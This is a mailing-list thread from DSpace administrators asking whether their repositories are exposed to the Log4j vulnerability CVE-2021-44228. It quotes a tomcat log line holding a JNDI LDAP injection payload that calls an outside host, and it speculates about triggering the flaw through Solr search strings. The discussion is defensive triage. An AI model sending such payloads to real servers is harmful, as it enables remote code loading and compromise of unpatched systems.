Hi, > I have already found a trace in the tomcat log:
I can see also see traces of attempts to exploit this vulnerability in the logs of our 2 DSpace instances (v6.2 and v5.2) so would appreciate a steer on whether DSpace is vulnerable to this particular exploit! And, if so, what action we should take to try and mitigate any risk. Cheers, Mike On Sunday, December 12, 2021 at 6:20:10 PM UTC Plate, Michael wrote: > > Hi, > > you might have recognized it since Friday: > > https://nvd.nist.gov/vuln/detail/CVE-2021-44228 > > This affects millions of sites. > > This is "red alert" status by the Federal Office for Information Security > of Germany. > > We are still running a DSpace 5.10, which uses log4j in version 1.2.17 > (and slf4j-log4j12-1.6.1 ?) > On Friday, only version > 2.0.0 <= 2.14.1 were known to be vulnerable, > today also 1.x is sort of vulnerable, but not like 2.x . > > I have already found a trace in the tomcat log: > > GET /$%7Bjndi:ldap:// > http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 403 - > > It is a 403, however a 404 would be nicer :) . > > It was not found in the dspace.log, however, a helping answer from someone > with more in-deep-knowledge of DSpace logging could save my holiday. > > DSpace 7 contains log4j 2.13.3. > Solr is already known to be vulnerable, but I cannot make any assumption > about that based on how DSpace uses it - maybe a search with a string like > {jndi:ldap://…} can trigger that. > > CU > > Michael -- All messages to this mailing list should adhere to the Code of Conduct: https://www.lyrasis.org/about/Pages/Code-of-Conduct.aspx --- You received this message because you are subscribed to the Google Groups "DSpace Technical Support" group. To unsubscribe from this group and stop receiving emails from it, send an email to [email protected]. To view this discussion on the web visit https://groups.google.com/d/msgid/dspace-tech/628afcdd-e19f-4136-9c2f-1b23c901a9ebn%40googlegroups.com.
